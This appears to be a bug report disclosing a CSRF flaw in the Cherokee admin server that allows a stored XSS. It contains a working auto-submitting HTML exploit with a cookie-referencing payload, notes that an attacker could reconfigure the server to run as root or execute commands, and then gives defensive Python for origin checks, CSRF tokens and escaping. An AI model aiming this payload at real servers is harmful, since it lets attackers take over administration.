Binary package hint: cherokee
The cherokee admin server is vulnerable to CSRF.
Using CSRF it is possible to produce a persistent XSS in several pages, at least in the 'status' page.
An example of this is the following:
<html>
<body>
<!-- auto-submitted POST to the admin server's vserver apply handler -->
<form action="http://127.0.0.1:9090/vserver/apply" method="post" id="xssform">
<input type="text" name="tmp!new_droot" value='/var/www/'></input>
<!-- the nick value carries the stored XSS payload -->
<input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'></input>
</form>
<script>document.getElementById("xssform").submit();</script>
</body>
</html>
A worst-case scenario could be something like the following:
If a user is logged in and the cherokee admin server is running on localhost:9090, then if they visit a $bad page which sends POST requests to the cherokee admin server, the bad page may be able to send requests to the server so as to reconfigure it to:
1. run as root
2. make the error (or access) logging run a command ...
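The two checks that close this attack class, as an added example in Python that is not the reporter's PoC and not cherokee-admin's own code: a state-changing POST is accepted only when the browser-supplied Origin (or Referer) matches the admin origin and the form carries a per-session token, and user-supplied config values are HTML-escaped before they are rendered back into pages such as the status page. The admin origin http://127.0.0.1:9090 and the field names tmp!new_nick / tmp!new_droot are taken from the PoC above; the csrf_token field, the session token value and the request dictionaries are constructed for the example. Binding the admin server to localhost does not help on its own, because the victim's browser is on localhost too.

```python
import hmac
import html
from urllib.parse import urlparse

# Assumption: the admin UI is reached at the origin used in the PoC above.
ADMIN_ORIGIN = "http://127.0.0.1:9090"

# The nick payload from the reporter's PoC, reused here as constructed input.
XSS_NICK = '" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'


def request_origin(headers):
    """Return the scheme://host[:port] the browser says the request came from.

    Browsers attach Origin to cross-site form POSTs; fall back to Referer for
    older clients. None means the request carries no usable provenance.
    """
    origin = headers.get("Origin")
    if origin and origin != "null":
        return origin
    referer = headers.get("Referer")
    if referer:
        p = urlparse(referer)
        if p.scheme and p.netloc:
            return "%s://%s" % (p.scheme, p.netloc)
    return None


def csrf_check(headers, form, session_token):
    """Accept a state-changing POST only if it is same-origin AND carries the
    per-session token (hypothetical field name 'csrf_token').

    A page on another origin, like the PoC above, fails the origin test and
    cannot read the token, so the auto-submitted form is rejected.
    """
    if request_origin(headers) != ADMIN_ORIGIN:
        return False
    submitted = form.get("csrf_token", "")
    # constant-time compare so the token cannot be guessed byte by byte
    return hmac.compare_digest(submitted.encode(), session_token.encode())


def render_vserver_row(nick, droot):
    """Render config values into HTML with escaping, so a nick like XSS_NICK
    shows up as text instead of becoming markup (the stored-XSS half)."""
    return ("<tr><td>%s</td><td>%s</td></tr>"
            % (html.escape(nick, quote=True), html.escape(droot, quote=True)))


def demo():
    token = "s3ss10n-t0k3n"  # in practice generated with secrets.token_urlsafe()
    # Constructed request as the PoC page would produce it: cross-site origin, no token.
    attacker = csrf_check({"Origin": "http://attacker.example"},
                          {"tmp!new_nick": XSS_NICK, "tmp!new_droot": "/var/www/"},
                          token)
    # Constructed request from the real admin UI: same origin, valid token.
    legit = csrf_check({"Origin": ADMIN_ORIGIN},
                       {"tmp!new_nick": "default", "csrf_token": token},
                       token)
    return attacker, legit, render_vserver_row(XSS_NICK, "/var/www/")


if __name__ == "__main__":
    print(demo())
```

Running the block prints (False, True, ...): the PoC-style request is rejected, the genuine one is accepted, and the rendered row contains &lt;embed rather than a live tag. The token check matters even with the origin check in place, since some clients strip Origin and Referer, in which case the request is treated as unknown provenance and refused.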